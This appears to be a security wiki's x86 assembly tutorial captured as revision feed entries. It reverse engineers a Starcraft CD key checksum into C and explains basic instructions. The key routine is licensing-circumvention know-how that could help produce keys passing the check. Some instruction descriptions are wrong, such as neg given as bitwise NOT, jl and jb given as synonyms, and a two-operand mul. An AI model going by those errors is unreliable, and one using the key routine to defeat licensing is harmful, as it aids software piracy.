jnz bottom<br />
<br />
mov eax, 1<br />
ret<br />
<br />
bottom:<br />
xor eax, eax<br />
ret<br />
</pre><br />
<br />
== Annotated Code ==<br />
Please, try this yourself first! <br />
<br />
I've been over this code a dozen times, so I know it very well. I've tried to annotate it as clearly as possible. <br />
<br />
<pre><br />
; Note: ecx is a pointer to a 13-digit Starcraft cdkey<br />
; This is a function that returns 1 if it's a valid key, or 0 if it's invalid<br />
mov eax, 3 ; Set eax to 3<br />
mov esi, ecx ; Move the cdkey pointer to esi. It'll likely stay there, since esi is non-volatile<br />
xor ecx, ecx ; Clear ecx. Since a loop is coming up, this might be a loop counter<br />
Top:<br />
movsx edx, byte ptr [ecx+esi] ; ecx is a loop counter, and esi is the cdkey. This takes the ecx'th .<br />
; character (dereferenced, because of the square brackets [ ]) and moves<br />
; it into edx. Since it's a character array (string), there is no multiplier<br />
; for the array index. <br />
<br />
sub edx, 30h ; Subtract 0x30 from the character. This converts the ascii character '0', <br />
; '1', '2', etc. to the integer 0, 1, 2, etc.<br />
lea edi, [eax+eax] ; Double eax. This is likely an accumulator, which stores a result. <br />
xor edx, edi ; Xor the current digit by the current checksum.<br />
add eax, edx ; Add the value in eax back into the checksum.<br />
inc ecx ; Increment the loop counter, ecx.<br />
cmp ecx, 0Ch ; Compare the loop counter to 0x0c, or 12. <br />
jl short Top ; Go back to the top until the 12th character (note that the last character<br />
; is skipped<br />
<br />
xor edx, edx ; Clear edx<br />
mov ecx, 0Ah ; Set edx to 0x0a (10)<br />
div ecx ; Remember division? edx is cleared above, so this basically does eax / ecx<br />
; We don't know yet whether it will use the quotient (eax) or remainder (edx)<br />
<br />
movsx eax, byte ptr [esi+0Ch] ; Move the last character in the cdkey to eax. Note that this used move with <br />
; sign extension, which means the character is signed. Because it's an ascii <br />
; number (between 0x30 and 0x39), it'll never be negative so this doesn't<br />
; matter. <br />
add edx, 30h ; Convert edx (which is the remainder from the division -- the checksum % 10)<br />
; back to an ascii character. From the integer 0, 1, 2, etc. to the characters<br />
; '0', '1', '2', etc.<br />
<br />
cmp eax, edx ; Compare the last digit of the cdkey to the checksum result. <br />
jnz bottom ; If they aren't equal, jump to the bottom, which returns 0<br />
<br />
mov eax, 1 ; Return 1<br />
ret<br />
<br />
bottom:<br />
xor eax, eax ; Clear eax, and return 0<br />
ret<br />
</pre><br />
<br />
== C Code ==<br />
Please, try this yourself first! <br />
<br />
This is an absolutely direct conversion from the annotated assembly to C. I added a main function that sends a bunch of test keys through the function to print out the results. <br />
<br />
Now that a driver function can test the CDKey validator, the code can be reduced and condensed. <br />
<br />
<pre><br />
#include <stdio.h><br />
<br />
/* Prototype */<br />
int checkCDKey(char *key);<br />
<br />
int main(int argc, char *argv[])<br />
{<br />
/* A series of test cases (I'm using fake keys here obviously, but real ones work even better) */<br />
char *keys[] = { "1212121212121", /* Valid */<br />
"3781030596831", /* Invalid */<br />
"3748596030203", /* Invalid */<br />
"1234567890123", /* Valid */<br />
"4962883551538", /* Valid */<br />
"0000000000000", /* Invalid */<br />
"1111111111111", /* Invalid */<br />
"2222222222222", /* Invalid */<br />
"3333333333333", /* Valid */<br />
"4444444444444", /* Invalid */<br />
"5555555555555", /* Invalid */<br />
"6666666666666", /* Invalid */<br />
"7777777777777", /* Invalid */<br />
"8888888888888", /* Invalid */<br />
"9999999999999" /* Invalid */<br />
};<br />
int valid[] = { 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0 };<br />
int i;<br />
<br />
for(i = 0; i < 15; i++)<br />
printf("%s: %d == %d\n", keys[i], valid[i], checkCDKey(keys[i]));<br />
<br />
return 0;<br />
}<br />
<br />
int checkCDKey(char *key)<br />
{<br />
int eax, ebx, ecx, edx, edi;<br />
char *esi;<br />
<br />
// This is C code, written and tested on the gcc computer, under Linux. However, this should universally work. <br />
// ; Note: ecx is a pointer to a 13-digit Starcraft cdkey<br />
// ; This is a function that returns 1 if it's a valid key, or 0 if it's invalid<br />
// mov eax, 3 ; Set eax to 3<br />
eax = 3;<br />
// mov esi, ecx ; Move the cdkey pointer to esi. It'll likely stay there, since esi is non-volatile<br />
esi = key;<br />
// xor ecx, ecx ; Clear ecx. Since a loop is coming up, this might be a loop counter<br />
ecx = 0;<br />
// Top:<br />
do<br />
{<br />
// movsx edx, byte ptr [ecx+esi] ; ecx is a loop counter, and esi is the cdkey. This takes the ecx'th .<br />
// ; character (dereferenced, because of the square brackets [ ]) and moves<br />
// ; it into ecx. Since it's a character array (string), there is no multiplier<br />
// ; for the array index. <br />
edx = *(ecx + esi);<br />
//<br />
// sub edx, 30h ; Subtract 0x30 from the character. This converts the ascii character '0', <br />
// ; '1', '2', etc. to the integer 0, 1, 2, etc.<br />
edx = edx - 0x30;<br />
// lea edi, [eax+eax] ; Double eax. This is likely an accumulator, which stores a result. <br />
edi = eax + eax;<br />
// xor edx, edi ; Xor the current digit by the current checksum.<br />
edx = edx ^ edi;<br />
// add eax, edx ; Add the value in eax back into the checksum.<br />
eax = eax + edx;<br />
// inc ecx ; Increment the loop counter, ecx.<br />
ecx++;<br />
// cmp ecx, 0Ch ; Compare the loop counter to 0x0c, or 12. <br />
// jl short Top ; Go back to the top until the 12th character (note that the last character<br />
}<br />
while(ecx < 0x0c);<br />
// ; is skipped<br />
//<br />
// xor edx, edx ; Clear edx<br />
edx = 0;<br />
// mov ecx, 0Ah ; Set edx to 0x0a (10)<br />
ecx = 0x0a;<br />
// div ecx ; Remember division? edx is cleared above, so this basically does eax / ecx<br />
// ; We don't know yet whether it will use the quotient (eax) or remainder (edx)<br />
edx = eax % ecx;<br />
//<br />
// movsx eax, byte ptr [esi+0Ch] ; Move the last character in the cdkey to eax. Note that this used move with <br />
// ; sign extension, which means the character is signed. Because it's an ascii <br />
// ; number (between 0x30 and 0x39), it'll never be negative so this doesn't<br />
// ; matter. <br />
eax = *(esi + 0x0c);<br />
// add edx, 30h ; Convert edx (which is the remainder from the division -- the checksum % 10)<br />
// ; back to an ascii character. From the integer 0, 1, 2, etc. to the characters<br />
// ; '0', '1', '2', etc.<br />
edx = edx + 0x30;<br />
//<br />
// cmp eax, edx ; Compare the last digit of the cdkey to the checksum result. <br />
if(eax == edx)<br />
{<br />
// jnz bottom ; If they aren't equal, jump to the bottom, which returns 0<br />
//<br />
// mov eax, 1 ; Return 1<br />
// ret<br />
return 1;<br />
}<br />
else<br />
{<br />
//<br />
// bottom:<br />
// xor eax, eax ; Clear eax, and return 0<br />
// ret<br />
return 0;<br />
}<br />
}<br />
</pre><br />
<br />
Here is the output:<br />
<pre><br />
1212121212121: 1 == 1<br />
3781030596831: 0 == 0<br />
3748596030203: 0 == 0<br />
1234567890123: 1 == 1<br />
4962883551538: 1 == 1<br />
0000000000000: 0 == 0<br />
1111111111111: 0 == 0<br />
2222222222222: 0 == 0<br />
3333333333333: 1 == 1<br />
4444444444444: 0 == 0<br />
5555555555555: 0 == 0<br />
6666666666666: 0 == 0<br />
7777777777777: 0 == 0<br />
8888888888888: 0 == 0<br />
9999999999999: 0 == 0<br />
</pre><br />
<br />
== Cleaned up C Code == <br />
Here's the same code with the assembly removed and some minor cleanups. After every change, the program should be run again to ensure that the code still works as expected. The driver function is unchanged, so here's the cleaned up C function:<br />
<br />
<pre><br />
int checkCDKey(char *key)<br />
{ <br />
int eax, ebx, ecx, edx, edi; <br />
char *esi;<br />
<br />
eax = 3;<br />
esi = key;<br />
ecx = 0;<br />
<br />
do<br />
{<br />
edx = *(ecx + esi);<br />
edx = edx - 0x30;<br />
edi = eax + eax;<br />
edx = edx ^ edi;<br />
eax = eax + edx;<br />
ecx++;<br />
}<br />
while(ecx < 0x0c);<br />
<br />
edx = 0;<br />
ecx = 0x0a;<br />
edx = eax % ecx;<br />
eax = *(esi + 0x0c);<br />
edx = edx + 0x30;<br />
if(eax == edx)<br />
return 1;<br />
else<br />
return 0;<br />
}<br />
</pre><br />
<br />
== Reduced C Code ==<br />
In this section the code will be reduced and cleaned up to be as friendly as possible. Technically, the above function can be left the way it is, but it's a good exercise to learn. <br />
<br />
First, the variables are renamed, unused variables are removed, and the return is condensed:<br />
<pre><br />
int checkCDKey(char *key)<br />
{<br />
int accum = 3;<br />
int i;<br />
int temp, temp2; <br />
<br />
accum = 3;<br />
i = 0;<br />
<br />
do<br />
{<br />
temp = *(i + key);<br />
temp = temp - 0x30;<br />
temp2 = accum + accum;<br />
temp = temp ^ temp2;<br />
accum = accum + temp;<br />
i++;<br />
}<br />
while(i < 0x0c);<br />
<br />
temp = 0;<br />
i = 0x0a;<br />
temp = accum % i;<br />
accum = *(key + 0x0c);<br />
temp = temp + 0x30;<br />
<br />
return accum == temp;<br />
}<br />
</pre><br />
<br />
Replace the pointers with array indexing, which looks a lot nicer:<br />
<pre><br />
int checkCDKey(char *key)<br />
{<br />
int accum = 3;<br />
int i;<br />
int temp, temp2; <br />
<br />
accum = 3;<br />
i = 0;<br />
<br />
do<br />
{<br />
temp = key[i];<br />
temp = temp - 0x30;<br />
temp2 = accum + accum;<br />
temp = temp ^ temp2;<br />
accum = accum + temp;<br />
i++;<br />
}<br />
while(i < 0x0c);<br />
<br />
temp = 0;<br />
i = 0x0a;<br />
temp = accum % i;<br />
accum = key[12];<br />
temp = temp + 0x30;<br />
<br />
return accum == temp;<br />
}<br />
</pre><br />
<br />
Substitute some variables with their values:<br />
<pre><br />
int checkCDKey(char *key)<br />
{<br />
int accum = 3;<br />
int i;<br />
int temp, temp2; <br />
<br />
accum = 3;<br />
i = 0;<br />
<br />
do<br />
{<br />
temp = key[i] - 0x30;<br />
temp = temp ^ (accum + accum);<br />
accum = accum + temp;<br />
i++;<br />
}<br />
while(i < 0x0c);<br />
<br />
temp = (accum % 10) + 0x30;<br />
accum = key[12];<br />
<br />
return accum == temp;<br />
}<br />
</pre><br />
<br />
Substitute some more variables, and replace the do..while loop with a for loop:<br />
<pre><br />
int checkCDKey(char *key)<br />
{<br />
int accum = 3;<br />
int i;<br />
int temp;<br />
<br />
accum = 3;<br />
i = 0;<br />
<br />
for(i = 0; i < 12; i++)<br />
{<br />
temp = (key[i] - 0x30) ^ (accum + accum);<br />
accum = accum + temp;<br />
}<br />
<br />
<br />
return key[12] == ((accum % 10) + 0x30);<br />
}<br />
</pre><br />
<br />
== Finished Code ==<br />
And finally, substitute the last of the variables:<br />
<pre><br />
int checkCDKey(char *key)<br />
{<br />
int accum = 3;<br />
int i;<br />
<br />
for(i = 0; i < 12; i++)<br />
accum += (key[i] - 0x30) ^ (accum + accum);<br />
<br />
return key[12] == ((accum % 10) + 0x30);<br />
}<br />
</pre><br />
<br />
That's as reduced as it gets. And running it through the driver function still works. <br />
<br />
That's all for example 1, the next example will demonstrate the way in which the Starcraft CDKey is shuffled before it is encoded.<br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Simple_Instructions&diff=3132Simple Instructions2012-01-14T05:19:44Z<p>Killboy: /* shl, shr, sal, sar */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section will go over some basic assembly instructions that you will likely see frequently. Some of the functions shown here are tricky, and some have special properties (such as the registers they use). Additionally, x86 assembly is comprised of hundreds of different instructions. As a result, you will likely want to find a complete reference book or website to have alongside you. This page however, will give enough of an introduction to get you started. <br />
<br />
== Pointers and Dereferencing==<br />
First, we will start with the hard stuff. If you understood the pointers section, this shouldn't be too bad. If you didn't, you should probably go back and refresh your memory. <br />
<br />
Recall that a pointer is a data type that stores an address as its value. Since registers are simply 32-bit values with no actual types, any register may or may not be a pointer, depending on what is stored. It is the responsibility of the program to treat pointers as pointers and to treat non-pointers as non-pointers. <br />
<br />
If a value is a pointer, it can be dereferenced. Recall that dereferencing a pointer retrieves the value stored at the address being pointed to. In assembly, this is generally done by putting square brackets ("[" and "]") around the register. For example:<br />
* eax -- is the value stored in eax<br />
* [eax] -- is the value pointed to by eax<br />
This will be thoroughly discussed in upcoming sections.<br />
<br />
== Doing Nothing ==<br />
The ''nop'' instruction is probably the simplest instruction in assembly. nop is short for "no operation" and it does nothing. This instruction is used for padding. <br />
<br />
== Moving Data Around ==<br />
The instructions in this section deal with relocating numbers and pointers. <br />
<br />
=== mov, movsx, movzx ===<br />
''mov'' is the instruction used for assignment, analogous to the "=" sign in most languages. mov can move data between a register and memory, two registers, or a constant to a register. Here are some examples:<br />
mov eax, 1 ; set eax to 1 (eax = 1)<br />
mov edx, ecx ; set edx to whatever ecx is (edx = ecx)<br />
mov eax, 18h ; set eax to 0x18<br />
mov eax, [ebx] ; set eax to the value in memory that ebx is pointing at<br />
mov [ebx], 3 ; move the number 3 into the memory address that ebx is pointing at<br />
<br />
''movsx'' and ''movzx'' are special versions of mov which are designed to be used between signed (movsx) and unsigned (movzx) registers of different sizes. <br />
<br />
''movsx'' means ''move with sign extension''. The data is moved from a smaller register into a bigger register, and the sign is preserved by either padding with 0's (for positive values) or F's (for negative values). Here are some examples:<br />
* '''0x1000''' becomes '''0x00001000''', since it was positive<br />
* '''0x7FFF''' becomes '''0x00007FFF''', since it was positive<br />
* '''0xFFFF''' becomes '''0xFFFFFFFF''', since it was negative (note that 0xFFFF is -1 in 16-bit signed, and 0xFFFFFFFF is -1 in 32-bit signed)<br />
* '''0x8000''' becomes '''0xFFFF8000''', since it was negative (note that 0x8000 is -32768 in 16-bit signed, and 0xFFFF8000 is -32768 in 32-bit signed)<br />
<br />
''movzx'' means ''move with zero extension''. The data is moved from a smaller register into a bigger register, and the sign is ignored. Here are some examples:<br />
* '''0x1000''' becomes '''0x00001000'''<br />
* '''0x7FFF''' becomes '''0x00007FFF'''<br />
* '''0xFFFF''' becomes '''0x0000FFFF'''<br />
* '''0x8000''' becomes '''0x00008000'''<br />
<br />
=== lea ===<br />
''lea'' is very similar to mov, except that math can be done on the original value before it is used. The "[" and "]" characters always surround the second parameter, but in this case they ''do not indicate dereferencing'', it is easiest to think of them as just being part of the formula. <br />
<br />
lea is generally used for calculating array offsets, since the address of an element of the array can be found with [arraystart + offset*datasize]. lea can also be used for quickly doing math, often with an addition and a multiplication. Examples of both uses are below. <br />
<br />
Here are some examples of using lea:<br />
lea eax, [eax+eax] ; Double the value of eax -- eax = eax * 2<br />
lea edi, [esi+0Bh] ; Add 11 to esi and store the result in edi<br />
lea eax, [esi+ecx*4] ; This is generally used for indexing an array of integers. esi is a <br />
pointer to the beginning of an array, and ecx is the index of the <br />
element that is to be retrieved. The index is multiplied by 4 <br />
because Integers are 4 bytes long. eax will end up storing the <br />
address of the ecx'th element of the array. <br />
<br />
lea edi, [eax+eax*2] ; Triple the value of eax -- eax = eax * 3<br />
lea edi, [eax+ebx*2] ; This likely indicates that eax stores an array of 16-bit (2 byte) <br />
values, and that ebx is an offset into it. Note the similarities <br />
between this and the previous example: the same math is being done, <br />
but for a different reason. <br />
<br />
== Math and Logic ==<br />
The instructions in this section deal with math and logic. Some are simple, and others (such as multiplication and division) are pretty tricky. <br />
<br />
=== add, sub ===<br />
A register can have either another register, a constant value, or a pointer added to or subtracted from it. The syntax of addition and subtraction is fairly simple:<br />
add eax, 3 ; Adds 3 to eax -- eax = eax + 3<br />
add ebx, eax ; Adds the value of eax to ebx -- ebx = ebx + eax<br />
sub ecx, 3 ; Subtracts 3 from ecx -- ecx = ecx - 3<br />
<br />
=== inc, dec ===<br />
These instructions simply increment and decrement a register. <br />
inc eax ; eax++<br />
dec ecx ; ecx--<br />
<br />
=== and, or, xor, neg ===<br />
All logical instructions are bitwise. If you don't know what "bitwise arithmetic" means, you should probably look it up. The simplest way of thinking of this is that each bit in the two operands has the operation done between them, and the result is stored in the first one. <br />
<br />
The instructions are pretty self-explanatory: and does a bitwise 'and', or does a bitwise 'or', xor does a bitwise 'xor', and neg does a bitwise negation.<br />
<br />
Here are some examples:<br />
and eax, 7 ; eax = eax & 7 -- because 7 is 000..000111, this clears all bits <br />
except for the last three. <br />
or eax, 16 ; eax = eax | 16 -- because 16 is 000..00010000, this sets the 5th <br />
bit from the right to "1". <br />
xor eax, 1 ; eax = eax ^ 1 -- this toggles the right-most bit in eax, 0=>1 or <br />
1=>0.<br />
xor eax, FFFFFFFFh ; eax = eax ^ 0xFFFFFFFF -- this toggles every bit in eax, which is <br />
identical to a bitwise negation.<br />
neg eax ; eax = ~eax -- inverts every bit in eax, same as the previous.<br />
xor eax, eax ; eax = 0 -- this clears eax quickly, and is extremely <br />
common.<br />
<br />
=== mul, imul, div, idiv, cdq ===<br />
Multiplication and division are the trickiest operations commonly used, because of how they deal with overflow issues. Both multiplication and division make use of the 64-bit register edx:eax. <br />
<br />
''mul'' multiplies the unsigned value in eax with the operand, and stores the result in the 64-bit pointer edx:eax. ''imul'' does the same thing, except the value is signed. Here are some examples of mul:<br />
mul ecx ; edx:eax = eax * ecx (unsigned)<br />
imul edx ; edx:eax = eax * edx (signed)<br />
<br />
When used with two parameters, ''mul'' instead multiplies the first by the second as expected:<br />
mul ecx, 10h ; ecx = ecx * 0x10 (unsigned)<br />
imul ecx, 20h ; ecx = ecx * 0x20 (signed)<br />
<br />
''div'' divides the 64-bit value in edx:eax by the operand, and stores the quotient in eax. The remainder (modulus) is stored in edx. In other words, div does both division and modular division, at the same time. Typically, a program will only use one or the other, so you will have to check which instructions follow to see whether eax or edx is saved. Here are some examples:<br />
div ecx ; eax = edx:eax / ecx (unsigned)<br />
; edx = edx:eax % ecx (unsigned)<br />
<br />
idiv ecx ; eax = edx:eax / ecx (signed)<br />
; edx = edx:eax % ecx (signed)<br />
<br />
''cdq'' is generally used immediately before idiv. It stands for "convert double to quad." In other words, convert the 32-bit value in eax to the 64-bit value in edx:eax, overwriting anything in edx with either 0's (if eax is positive) or F's (if eax is negative). This is very similar to movsx, above. <br />
<br />
''xor edx, edx'' is generally used immediately before div. It clears edx to ensure that no leftover data is divided. <br />
<br />
Here is a common use of cdq and idiv:<br />
mov eax, 1007 ; 1007 will be divided<br />
mov ecx, 10 ; .. by 10<br />
cdq ; extends eax into edx<br />
idiv ecx ; eax will be 1007/10 = 100, and edx will be 1007%10 = 7<br />
<br />
Here is a common use of xor and div (the results are the same as the previous example):<br />
mov eax, 1007<br />
mov ecx, 10<br />
xor edx, edx<br />
div ecx<br />
<br />
== shl, shr, sal, sar ==<br />
shl - shift left, shr - shift right.<br />
<br />
sal - shift arithmetic left, sar - shift arithmetic right.<br />
<br />
These are used to do a binary shift, equivalent to the C operations << and >>.<br />
They each take two operations: the register to use, and the number of places to shift the value in the regoster. As computers operate in base 2, these commands can be used as a faster replacement for multiplication/division operations involving powers of 2.<br />
<br />
Divide by 2 (unsigned):<br />
mov eax, 16 ; eax = 16<br />
shr eax, 1 ; eax = 8<br />
<br />
Multiply by 4 (signed):<br />
mov eax, 5 ; eax = 5<br />
sal eax, 2 ; eax = 20<br />
<br />
Visualising the bits moving:<br />
mov eax, 7 ; = 0000 0111 (7)<br />
shl eax, 1 ; = 0000 1110 (14)<br />
shl eax, 2 ; = 0011 1000 (56)<br />
shr eax, 1 ; = 0001 1100 (28)<br />
<br />
== Jumping Around ==<br />
Instructions in this section are used to compare values and to make jumps. These jumps are used for calls, if statements, and every type of loop. The operand for most jump instructions is the address to jump to. <br />
<br />
=== jmp ===<br />
''jmp'', or jump, sends the program execution to the specified address no matter what. Here is an example:<br />
jmp 1400h ; jump to the address 0x1400<br />
<br />
=== call, ret ===<br />
''call'' is similar to jump, except that in addition to sending the program to the specified address, it also saves ("pushes") the address of the executable instruction onto the stack. This will be explained more in a later section. <br />
<br />
''ret'' removes ("pops") the first value off of the stack, and jumps to it. In almost all cases, this value was placed onto the stack by the call instruction. If the stack pointer is at the wrong location, or the saved address was overwritten, ret attempts to jump to an invalid address which usually crashes the program. In some cases, it may jump to the wrong place where the program will almost inevitably crash. <br />
<br />
''ret'' can also have a parameter. This parameter is added to the stack immediately after ret executes its jump. This addition allows the function to remove values that were pushed onto the stack. This will be discussed in a later section. <br />
<br />
The combination of ''call'' and ''ret'' are used to implement functions. Here is an example of a simple function:<br />
<br />
<pre> call 4000h<br />
...... ; any amount of code<br />
4000h:<br />
mov eax, 1<br />
ret ; Because eax represents the return value, this function would return 1, and <br />
nothing else would happen<br />
</pre><br />
<br />
=== cmp, test ===<br />
''cmp'', or compare, compares the two operands and sets a number of flags in a special-purpose register based on the result. Specialized jump commands can check these flags to jump on certain conditions. One way of remembering how ''cmp'' works is to think of it as subtracting the second parameter from the first, comparing the result to 0, and throwing away the result. <br />
<br />
''test'' is very similar to ''cmp'', except that it performs a bitwise 'and' operation between the two variables (and throws away the result), and compares it to zero. ''test'' is most commonly used to compare a variable to itself to check if it's zero. <br />
<br />
Here are the most common flags:<br />
* Zero -- set if and only if the two elements are equal (ie, if the resultant operation was equal to zero)<br />
* Greater than -- set if the first element is greater than the second (ie, if the resultant operation was greater than zero)<br />
* Less than -- set if the first element is less than the second (ie, if the resultant operation was less than zero)<br />
<br />
Flags are set by most arithmetic commands. The most commonly used commands used for comparisons are cmp, inc, and dec.<br />
<br />
=== jz/je, jnz/jne, jl/jb, jg, jle, jge ===<br />
* ''jz'' and ''je'' (which are synonyms) will jump to the address specified if and only if the 'zero' flag is set, which indicates that the two values were equal. In other words, "jump if equal". <br />
* ''jnz'' and ''jne'' (which are also synonyms) will jump to the address specified if and only if the 'zero' flag is not set, which indicates that the two values were not equal. In other words, "jump if different". <br />
* ''jl'' and ''jb'' (which are synonyms) jumps if the first parameter is less than the second. <br />
* ''jg'' jumps if the first parameter is greater than the second. <br />
* ''jle'' jumps if the 'less than' or the 'zero' flag is set, so "less than or equal to". <br />
* ''jge'' jumps if the first is "greater than or equal to" the second.<br />
<br />
These jumps are all used to implement various loops and conditions. For example, here is some C code:<br />
if(a == 3)<br />
b;<br />
else<br />
c;<br />
And here is how it might look in assembly (not exactly assembly, but this is an example):<br />
10 cmp a, 3<br />
20 jne 50<br />
30 b<br />
40 jmp 60<br />
50 c<br />
60<br />
<br />
Here is an example of a loop in C:<br />
for(i = 0; i < 5; i++)<br />
{<br />
a;<br />
b;<br />
}<br />
And here is the equivalent loop in assembly:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 inc ecx<br />
50 cmp ecx, 5<br />
60 jl 20<br />
<br />
== Manipulating the Stack ==<br />
Functions in this section are used for adding and removing data from the stack. The stack will be examined in detail in a later section; this section will simply show some commonly used commands. <br />
<br />
=== push, pop ===<br />
''push'' decrements the stack pointer by the size of the operand, then saves the operand to the new address. This line:<br />
push ecx<br />
Is functionally equivalent to:<br />
sub esp, 4<br />
mov [esp], ecx<br />
<br />
''pop'' sets the operand to the value on the stack, then increments the stack pointer by the size of the operand. This assembly:<br />
pop ecx<br />
Is functionally equivalent to:<br />
mov ecx, [esp]<br />
add esp, 4<br />
<br />
This will be examined in detail in the Stack section of this tutorial.<br />
<br />
=== pushaw, pushad, popaw, popad ===<br />
''pushaw'' and ''pushad'' save all 16-bit or 32-bit registers (respectively) onto the stack. <br />
<br />
''popaw'' and ''popad'' restore all 16-bit or 32-bit registers from the stack. <br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, and I will do my best to answer them; however, you may need to contact me to let me know that a question exists.<br />
<br />
Further explain bitwise<br />
<br />
In your example code:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 cmp ecx, 5<br />
50 jl 20<br />
Wont this just loop forever because ecx is never incremented? Total noob here so i may have missed something obvious.<br />
*** Yes, my mistake. <br />
<br />
Indeed, would not this be more accurate?:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 inc ecx<br />
50 comp ecx, 5<br />
60 jl 20<br />
*** Changed. <br />
<br />
Also, The stack is decremented when pushed, but increased when poped? Isn't this counterintuitive?<br />
*** Yes, the stack starts high and grows downwards. Welcome to x86 assembler!</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Simple_Instructions&diff=3131Simple Instructions2012-01-14T05:18:48Z<p>Killboy: /* shl, shr, sal, sar */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section will go over some basic assembly instructions that you will likely see frequently. Some of the functions shown here are tricky, and some have special properties (such as the registers they use). Additionally, x86 assembly is comprised of hundreds of different instructions. As a result, you will likely want to find a complete reference book or website to have alongside you. This page however, will give enough of an introduction to get you started. <br />
<br />
== Pointers and Dereferencing==<br />
First, we will start with the hard stuff. If you understood the pointers section, this shouldn't be too bad. If you didn't, you should probably go back and refresh your memory. <br />
<br />
Recall that a pointer is a data type that stores an address as its value. Since registers are simply 32-bit values with no actual types, any register may or may not be a pointer, depending on what is stored. It is the responsibility of the program to treat pointers as pointers and to treat non-pointers as non-pointers. <br />
<br />
If a value is a pointer, it can be dereferenced. Recall that dereferencing a pointer retrieves the value stored at the address being pointed to. In assembly, this is generally done by putting square brackets ("[" and "]") around the register. For example:<br />
* eax -- is the value stored in eax<br />
* [eax] -- is the value pointed to by eax<br />
This will be thoroughly discussed in upcoming sections.<br />
<br />
== Doing Nothing ==<br />
The ''nop'' instruction is probably the simplest instruction in assembly. nop is short for "no operation" and it does nothing. This instruction is used for padding. <br />
<br />
== Moving Data Around ==<br />
The instructions in this section deal with relocating numbers and pointers. <br />
<br />
=== mov, movsx, movzx ===<br />
''mov'' is the instruction used for assignment, analogous to the "=" sign in most languages. mov can move data between a register and memory, two registers, or a constant to a register. Here are some examples:<br />
mov eax, 1 ; set eax to 1 (eax = 1)<br />
mov edx, ecx ; set edx to whatever ecx is (edx = ecx)<br />
mov eax, 18h ; set eax to 0x18<br />
mov eax, [ebx] ; set eax to the value in memory that ebx is pointing at<br />
mov [ebx], 3 ; move the number 3 into the memory address that ebx is pointing at<br />
<br />
''movsx'' and ''movzx'' are special versions of mov which are designed to be used between signed (movsx) and unsigned (movzx) registers of different sizes. <br />
<br />
''movsx'' means ''move with sign extension''. The data is moved from a smaller register into a bigger register, and the sign is preserved by either padding with 0's (for positive values) or F's (for negative values). Here are some examples:<br />
* '''0x1000''' becomes '''0x00001000''', since it was positive<br />
* '''0x7FFF''' becomes '''0x00007FFF''', since it was positive<br />
* '''0xFFFF''' becomes '''0xFFFFFFFF''', since it was negative (note that 0xFFFF is -1 in 16-bit signed, and 0xFFFFFFFF is -1 in 32-bit signed)<br />
* '''0x8000''' becomes '''0xFFFF8000''', since it was negative (note that 0x8000 is -32768 in 16-bit signed, and 0xFFFF8000 is -32768 in 32-bit signed)<br />
<br />
''movzx'' means ''move with zero extension''. The data is moved from a smaller register into a bigger register, and the sign is ignored. Here are some examples:<br />
* '''0x1000''' becomes '''0x00001000'''<br />
* '''0x7FFF''' becomes '''0x00007FFF'''<br />
* '''0xFFFF''' becomes '''0x0000FFFF'''<br />
* '''0x8000''' becomes '''0x00008000'''<br />
<br />
=== lea ===<br />
''lea'' is very similar to mov, except that math can be done on the original value before it is used. The "[" and "]" characters always surround the second parameter, but in this case they ''do not indicate dereferencing'', it is easiest to think of them as just being part of the formula. <br />
<br />
lea is generally used for calculating array offsets, since the address of an element of the array can be found with [arraystart + offset*datasize]. lea can also be used for quickly doing math, often with an addition and a multiplication. Examples of both uses are below. <br />
<br />
Here are some examples of using lea:<br />
lea eax, [eax+eax] ; Double the value of eax -- eax = eax * 2<br />
lea edi, [esi+0Bh] ; Add 11 to esi and store the result in edi<br />
lea eax, [esi+ecx*4] ; This is generally used for indexing an array of integers. esi is a <br />
pointer to the beginning of an array, and ecx is the index of the <br />
element that is to be retrieved. The index is multiplied by 4 <br />
because Integers are 4 bytes long. eax will end up storing the <br />
address of the ecx'th element of the array. <br />
<br />
lea edi, [eax+eax*2] ; Triple the value of eax -- eax = eax * 3<br />
lea edi, [eax+ebx*2] ; This likely indicates that eax stores an array of 16-bit (2 byte) <br />
values, and that ebx is an offset into it. Note the similarities <br />
between this and the previous example: the same math is being done, <br />
but for a different reason. <br />
<br />
== Math and Logic ==<br />
The instructions in this section deal with math and logic. Some are simple, and others (such as multiplication and division) are pretty tricky. <br />
<br />
=== add, sub ===<br />
A register can have either another register, a constant value, or a pointer added to or subtracted from it. The syntax of addition and subtraction is fairly simple:<br />
add eax, 3 ; Adds 3 to eax -- eax = eax + 3<br />
add ebx, eax ; Adds the value of eax to ebx -- ebx = ebx + eax<br />
sub ecx, 3 ; Subtracts 3 from ecx -- ecx = ecx - 3<br />
<br />
=== inc, dec ===<br />
These instructions simply increment and decrement a register. <br />
inc eax ; eax++<br />
dec ecx ; ecx--<br />
<br />
=== and, or, xor, neg ===<br />
All logical instructions are bitwise. If you don't know what "bitwise arithmetic" means, you should probably look it up. The simplest way of thinking of this is that each bit in the two operands has the operation done between them, and the result is stored in the first one. <br />
<br />
The instructions are pretty self-explanatory: and does a bitwise 'and', or does a bitwise 'or', xor does a bitwise 'xor', and neg does a bitwise negation.<br />
<br />
Here are some examples:<br />
and eax, 7 ; eax = eax & 7 -- because 7 is 000..000111, this clears all bits <br />
except for the last three. <br />
or eax, 16 ; eax = eax | 16 -- because 16 is 000..00010000, this sets the 5th <br />
bit from the right to "1". <br />
xor eax, 1 ; eax = eax ^ 1 -- this toggles the right-most bit in eax, 0=>1 or <br />
1=>0.<br />
xor eax, FFFFFFFFh ; eax = eax ^ 0xFFFFFFFF -- this toggles every bit in eax, which is <br />
identical to a bitwise negation.<br />
neg eax ; eax = ~eax -- inverts every bit in eax, same as the previous.<br />
xor eax, eax ; eax = 0 -- this clears eax quickly, and is extremely <br />
common.<br />
<br />
=== mul, imul, div, idiv, cdq ===<br />
Multiplication and division are the trickiest operations commonly used, because of how they deal with overflow issues. Both multiplication and division make use of the 64-bit register edx:eax. <br />
<br />
